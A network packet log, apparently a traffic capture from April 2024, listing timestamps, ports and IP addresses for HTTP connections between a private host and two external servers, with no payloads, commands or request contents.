Apr 26, 2024 17:11:12.035105944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035125017 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035126925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035149097 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035162926 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035170078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035190105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035204887 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035211086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035233021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035245895 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035254002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035274029 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035288095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035548925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035588026 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035885096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035936117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035957098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.035973072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035979033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036000013 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036015034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036020994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036041975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036057949 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036062956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036083937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036106110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036118031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036153078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036212921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036397934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036437035 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036487103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036530018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036551952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036566973 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036616087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036638021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036654949 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036659002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036693096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036699057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036791086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036813021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036828041 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.036842108 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.036878109 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.037369967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.037391901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.037430048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.037446976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.037489891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.037511110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.037524939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.037681103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.037719011 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.038091898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.038146973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.038183928 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.209549904 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.257819891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.257850885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.257875919 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.257910013 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.258030891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.258069038 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.258074045 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.258158922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.258182049 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.258202076 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259166956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259201050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259222031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259222984 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259244919 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259260893 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259265900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259289026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259306908 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259313107 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259334087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259351015 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259387970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259409904 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259428024 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259432077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259453058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259469032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259490013 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259511948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259529114 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259536028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259556055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259573936 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259577036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259601116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259614944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259622097 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259660006 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259665966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259687901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259708881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259722948 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259748936 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259787083 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.259944916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259967089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.259989977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.260005951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.260011911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.260046959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.260514021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.260536909 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.260560036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.260576010 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.260580063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.260617018 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.261574984 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261600018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261624098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261642933 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.261648893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261672020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261687040 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.261697054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261719942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.261734962 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.262072086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262113094 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.262139082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262264967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262289047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262304068 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.262460947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262484074 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262500048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.262526035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262550116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262563944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.262594938 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262619972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.262634993 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.263530970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263588905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.263602972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263695955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263719082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263737917 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.263788939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263811111 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263828039 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.263859034 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263897896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.263901949 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263974905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.263998032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264013052 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.264023066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264058113 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.264199972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264236927 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264271975 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.264281988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264302969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264337063 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.264343977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264383078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264403105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264420033 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.264471054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.264511108 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.289087057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289119959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289138079 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289155960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289164066 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.289175987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289195061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289203882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.289215088 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289232969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289236069 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.289271116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.289510965 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289541960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.289581060 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.290514946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290563107 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290582895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290600061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290611029 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.290618896 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290638924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290642977 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.290678024 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.290688992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290705919 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290723085 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.290746927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.292679071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.292697906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.292718887 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.292753935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.292793989 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.292807102 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293055058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293072939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293109894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293126106 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293143034 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293163061 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293210030 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293226957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293250084 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293642044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293688059 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293711901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293729067 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293745995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293764114 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293809891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.293843031 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.293889046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295411110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295448065 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.295469999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295488119 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295527935 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.295533895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295568943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295605898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.295633078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295711994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295752048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.295772076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295789957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295825005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.295850039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295881987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295898914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295917988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.295959949 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295978069 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.295999050 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.296015024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296034098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296051979 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296066046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.296091080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296093941 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.296138048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296170950 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296175003 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.296190977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296207905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296226978 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.296257973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296293974 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.296463013 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296515942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.296552896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.297060966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297079086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297117949 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.297159910 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297177076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297223091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.297231913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297249079 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297266960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.297290087 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299081087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299107075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299120903 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299137115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299171925 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299216032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299233913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299249887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299267054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299272060 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299303055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299314022 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299323082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299340963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299362898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299443960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299479008 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299496889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299566031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299582005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299603939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299611092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299649954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299653053 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299721956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299741983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299758911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299762011 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299794912 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299810886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299841881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299858093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299875975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299880981 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299922943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299938917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299953938 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.299957037 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.299979925 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300004005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300045013 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300179005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300200939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300225019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300246954 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300262928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300282001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300298929 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300343990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300383091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300467014 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300540924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300559044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300595999 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300614119 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300647020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300656080 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300667048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300683975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300704956 CEST	80	49713	176.97.76.106	192.168.2.5
